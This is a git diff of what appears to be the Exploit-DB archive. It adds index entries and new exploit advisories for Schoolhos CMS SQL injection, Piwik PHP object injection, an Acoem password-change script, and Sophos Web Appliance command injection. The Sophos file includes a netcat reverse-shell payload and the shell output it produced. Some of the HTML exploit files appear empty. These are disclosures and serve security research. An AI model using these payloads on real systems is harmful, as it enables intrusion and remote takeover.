- 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0 34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting",2010-01-13,PaL-D3v1L,php,webapps,0 34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0 34024,platforms/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,"ViRuSMaN ",php,webapps,0 @@ -36710,7 +36710,7 @@ id,file,description,date,author,platform,type,port 40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099 40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0 40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection (2)",2016-10-21,"Arbin Godar",php,webapps,0 -40614,platforms/php/webapps/40614.py,"FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0 +40614,platforms/php/webapps/40614.py,"FreePBX 13 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0 40617,platforms/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos,0 40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0 40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0 @@ -36800,4 +36800,11 @@ id,file,description,date,author,platform,type,port 40712,platforms/windows/remote/40712.py,"PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow",2016-11-04,Karri93,windows,remote,0 40713,platforms/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0 40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0 -40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0 +40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0 +40719,platforms/php/webapps/40719.txt,"Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection",2016-11-07,Vulnerability-Lab,php,webapps,0 +40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0 +40721,platforms/windows/remote/40721.html,"Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080 / MS14-084)",2016-11-07,Skylined,windows,remote,0 +40722,platforms/windows/dos/40722.html,"Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0 +40723,platforms/php/webapps/40723.txt,"NodCMS - PHP Code Execution",2016-11-07,"Ashiyane Digital Security Team",php,webapps,0 +40724,platforms/php/webapps/40724.txt,"Piwik 2.16.0 - 'layout' PHP Object Injection",2016-11-07,"Egidio Romano",php,webapps,80 +40725,platforms/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,php,webapps,0 diff --git a/platforms/hardware/remote/40720.sh b/platforms/hardware/remote/40720.sh new file mode 100755 index 000000000..6ec9215d2 --- /dev/null +++ b/platforms/hardware/remote/40720.sh @@ -0,0 +1,37 @@ +#!/bin/sh +# +# Acoem 01dB CUBE Smart Noise Monitoring Terminal +# Remote Password Change +# +# HW version: LIS001A +# Application FW: 2.34 +# Metrology FW: 2.10 +# Modem FW: 12.00.005 / 08.01.108 +# +# +# Copyright 2016 (c) Todor Donev +# +# https://www.ethical-hacker.org/ +# https://www.facebook.com/ethicalhackerorg +# +# Disclaimer: +# This or previous programs is for Educational +# purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the +# fact that Todor Donev is not liable for any +# damages caused by direct or indirect use of the +# information or functionality provided by these +# programs. The author or any Internet provider +# bears NO responsibility for content or misuse +# of these programs or any derivatives thereof. +# By using these programs you accept the fact +# that any damage (dataloss, system crash, +# system compromise, etc.) caused by the use +# of these programs is not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# Thanks to Maya Hristova that support me. + +[todor@adamantium ~]$ GET "http:///ajax/F_validPassword.asp?NewPwd=" diff --git a/platforms/php/webapps/12084.txt b/platforms/php/webapps/12084.txt index 90afb2f19..6dce51d39 100755 --- a/platforms/php/webapps/12084.txt +++ b/platforms/php/webapps/12084.txt @@ -1,4 +1,3 @@ - ============================================================================================================= diff --git a/platforms/php/webapps/40719.txt b/platforms/php/webapps/40719.txt new file mode 100755 index 000000000..edd931e32 --- /dev/null +++ b/platforms/php/webapps/40719.txt @@ -0,0 +1,174 @@ +Document Title: +=============== +Schoolhos CMS v2.29 - (kelas) Data Siswa SQL Injection Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1931 + + +Release Date: +============= +2016-11-07 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1931 + + +Common Vulnerability Scoring System: +==================================== +6.7 + + +Product & Service Introduction: +=============================== +Schoolhos CMS is alternative to developing School Website. It's Free and Open Source under GPL License. Easy to install, user friendly and elegant design. + +(Copy of the Vendor Homepage: http://www.schoolhos.com/ & https://sourceforge.net/projects/schoolhoscms/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a remote sql-injection vulnerability in the official Schoolhos v2_29 content management system. + + +Vulnerability Disclosure Timeline: +================================== +2016-11-07: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A remote sql injection web vulnerability has been discovered in the official Schoolhos v2_29 content management system. +The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms. + +The sql injection vulnerability is located in the `kelas` parameter of the `index?p=siswakelas module POST method request. +Remote attackers are able to execute own sql commands by usage of an insecure post method request through the vulnerable +parameter of the own application. The attack vector of the vulnerability is application-side and the request method to +inject is POST. The security vulnerability in the content management system is a classic select remote sql-injection. + +The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.7. +Exploitation of the remote sql injection vulnerability requires no user interaction or privileged web-application user account. +Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] ./SCRIPTPATH/index.php?p=siswakelas + +Vulnerable Parameter(s): +[+] kelas + + +Proof of Concept (PoC): +======================= +The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction. +For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue. + + +-- PoC Session Logs --- +[+] Place: POST > Parameter: kelas + +Type: boolean-based blind +Title: AND boolean-based blind - WHERE or HAVING clause +Payload: kelas=1' AND 4945=4945 AND 'SfWY'='SfWY + +Type: UNION query +Title: MySQL UNION query (NULL) - 3 columns +Payload: kelas=-2062' UNION ALL SELECT NULL,CONCAT(0x71736b6271,0x43746d4846536767524d,0x716b6d6171),NULL# + +Type: AND/OR time-based blind +Title: MySQL > 5.0.11 AND time-based blind +Payload: kelas=1' AND SLEEP(5) AND 'Wqrd'='Wqrd +--- +[21 tables] ++-----------------+ +| sh_agenda | +| sh_album | +| sh_berita | +| sh_buku_tamu | +| sh_galeri | +| sh_guru_staff | +| sh_info_sekolah | +| sh_jabatan | +| sh_kategori | +| sh_kelas | +| sh_komentar | +| sh_mapel | +| sh_materi | +| sh_pengaturan | +| sh_pengumuman | +| sh_psb | +| sh_sidebar | +| sh_siswa | +| sh_statistik | +| sh_tema | +| sh_users | ++-----------------+ + + +Solution - Fix & Patch: +======================= +The sql-injection vulnerability in the `kelas` parameter of the `index.php` file POST method request can be patched by usage of a secure +prepared statement. Parse the parameter and encode the values to a secure format to prevent further +sql-injection attacks. Escape the parameter and disallow usage of special chars. + + +Security Risk: +============== +The security risk of the remote sql-injection web vulnerability in the schoolhos content management system is estimated as high. (CVSS 6.7) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Lawrence Amer (www.vulnerability-lab.com/show.php?user=Lawrence Amer) + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php + +Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark +of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission. + + Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com + + diff --git a/platforms/php/webapps/40723.txt b/platforms/php/webapps/40723.txt new file mode 100755 index 000000000..1dc431d2d --- /dev/null +++ b/platforms/php/webapps/40723.txt @@ -0,0 +1,64 @@ + +
+ + +
+ + + diff --git a/platforms/php/webapps/40724.txt b/platforms/php/webapps/40724.txt new file mode 100755 index 000000000..9e65ec9d9 --- /dev/null +++ b/platforms/php/webapps/40724.txt @@ -0,0 +1,77 @@ +--------------------------------------------------------------- +Piwik <= 2.16.0 (saveLayout) PHP Object Injection Vulnerability +--------------------------------------------------------------- + + +[-] Software Link: + +https://piwik.org/ + + +[-] Affected Versions: + +Version 2.16.0 and prior versions. + + +[-] Vulnerability Description: + +The vulnerability can be triggered through the saveLayout() method defined in /plugins/Dashboard/Controller.php: + +210. public function saveLayout() +211. { +212. $this->checkTokenInUrl(); +213. +214. $layout = Common::unsanitizeInputValue(Common::getRequestVar('layout')); +215. $layout = strip_tags($layout); +216. $idDashboard = Common::getRequestVar('idDashboard', 1, 'int'); +217. $name = Common::getRequestVar('name', '', 'string'); +218. +219. if (Piwik::isUserIsAnonymous()) { +220. $session = new SessionNamespace("Dashboard"); +221. $session->dashboardLayout = $layout; +222. $session->setExpirationSeconds(1800); + +User input passed by anonymous users through the "layout" request parameter is being stored into +a session variable at line 221, and this is possible by invoking an URL like this: + +http://[piwik]/index.php?module=Dashboard&action=saveLayout&token_auth=anonymous&layout=[injection]%26%2365536; + +Since Piwik is not using "utf8mb4" collations for its database, this can be exploited in combination with a MySQL +UTF8 truncation issue in order to corrupt the session array, allowing unauthenticated attackers to inject arbitrary +PHP objects into the application scope and carry out Server-Side Request Forgery (SSRF) attacks, delete arbitrary +files, execute arbitrary PHP code, and possibly other attacks. Successful exploitation of this vulnerability +requires Piwik to use the database to store session data (dbtable option) and the application running on +PHP before version 5.4.45, 5.5.29, or 5.6.13. + + +[-] Solution: + +Update to version 2.16.1 or later. + + +[-] Disclosure Timeline: + +[08/02/2016] - Vendor notified +[09/02/2016] - Vendor replied not to be able to reproduce the issue +[11/02/2016] - Proof of concept tested on demo.piwik.org sent to the vendor +[11/02/2016] - Vendor response stating the issue will be fixed in 2.16.1 release +[17/02/2016] - Bug bounty received +[11/04/2016] - Version 2.16.1 released: http://piwik.org/changelog/piwik-2-16-1/ +[16/06/2016] - CVE number requested +[07/11/2016] - Public disclosure + + +[-] CVE Reference: + +The Common Vulnerabilities and Exposures project (cve.mitre.org) +has not assigned a CVE identifier for this vulnerability. + + +[-] Credits: + +Vulnerability discovered by Egidio Romano. + + +[-] Original Advisory: + +http://karmainsecurity.com/KIS-2016-13 \ No newline at end of file diff --git a/platforms/php/webapps/40725.txt b/platforms/php/webapps/40725.txt new file mode 100755 index 000000000..7a93dd397 --- /dev/null +++ b/platforms/php/webapps/40725.txt @@ -0,0 +1,129 @@ +KL-001-2016-009 : Sophos Web Appliance Remote Code Execution + +Title: Sophos Web Appliance Remote Code Execution +Advisory ID: KL-001-2016-009 +Publication Date: 2016.11.03 +Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt + + +1. Vulnerability Details + + Affected Vendor: Sophos + Affected Product: Web Apppliance + Affected Version: v4.2.1.3 + Platform: Embedded Linux + CWE Classification: CWE-78: Improper Neutralization of Special Elements + used in an OS Command ('OS Command Injection'), + CWE-88: Argument Injection or Modification + Impact: Remote Code Execution + Attack vector: HTTP + +2. Vulnerability Description + + An authenticated user of any privilege can execute arbitrary + system commands as the non-root webserver user. + +3. Technical Description + + Multiple parameters to the web interface are unsafely handled and + can be used to run operating system commands, such as: + + POST /index.php?c=logs HTTP/1.1 + Host: [redacted] + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) +Gecko/20100101 Firefox/46.0 + Accept: text/javascript, text/html, application/xml, text/xml, */* + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate, br + DNT: 1 + X-Requested-With: XMLHttpRequest + X-Prototype-Version: 1.6.1 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Content-Length: 305 + Connection: close + + +STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1 + + HTTP/1.1 200 OK + Date: Tue, 10 May 2016 15:35:05 GMT + Server: Apache + Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, +pre-check=0 + Pragma: no-cache + X-Frame-Options: sameorigin + X-Content-Type-Options: nosniff + Connection: close + Content-Type: text/html; charset=utf-8 + Content-Length: 207 + + {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10 +4:35 +PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"} + + -- + + The vulnerable parameters are: by, request_id, and txt_filter_domain + + That request launches the following process on the SWA: + + 1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c +/opt/perl/bin/salp-generate-report.pl --report=Filter --res=- +--type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA==' +--start='2016/05/10' --end='2016/05/10' --action='' +--sid=590fca17b230e8cdba0394cfa28ef2eb + + From the shell launched via netcat: + + id;uname -a;uptime + uid=1000(spiderman) gid=1000(spiderman) +groups=1000(spiderman),16(cron),44(tproxyd),45(wdx) + Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux + 15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15 + +4. Mitigation and Remediation Recommendation + + The vendor has issued a fix for this vulnerability in Version + 4.3 of SWA. Release notes available at: + + http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html + +5. Credit + + This vulnerability was discovered by Matt Bergin (@thatguylevel) + of KoreLogic, Inc. + +6. Disclosure Timeline + + 2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos + 2016.09.14 - Sophos requests KoreLogic re-send vulnerability details. + 2016.09.28 - KoreLogic requests status update. + 2016.09.28 - Sophos informs KoreLogic that an update including a fix + for this vulnerability will be available near the end + of October. + 2016.10.13 - Sophos informs KoreLogic that the update was released to a + limited customer base and is expected to be distributed + at-large over the following week. + 2016.11.03 - Public disclosure. + +7. Proof of Concept + + See 3. Technical Description. + + +The contents of this advisory are copyright(c) 2016 +KoreLogic, Inc. and are licensed under a Creative Commons +Attribution Share-Alike 4.0 (United States) License: +http://creativecommons.org/licenses/by-sa/4.0/ + +KoreLogic, Inc. is a founder-owned and operated company with a +proven track record of providing security services to entities +ranging from Fortune 500 to small and mid-sized companies. We +are a highly skilled team of senior security consultants doing +by-hand security assessments for the most important networks in +the U.S. and around the world. We are also developers of various +tools and resources aimed at helping the security community. +https://www.korelogic.com/about-korelogic.html + +Our public vulnerability disclosure policy is available at: +https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt diff --git a/platforms/windows/dos/40722.html b/platforms/windows/dos/40722.html new file mode 100755 index 000000000..0b68fdc31 --- /dev/null +++ b/platforms/windows/dos/40722.html @@ -0,0 +1,115 @@ + + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/remote/40721.html b/platforms/windows/remote/40721.html new file mode 100755 index 000000000..f87c619a1 --- /dev/null +++ b/platforms/windows/remote/40721.html @@ -0,0 +1,220 @@ + + + + + + + + +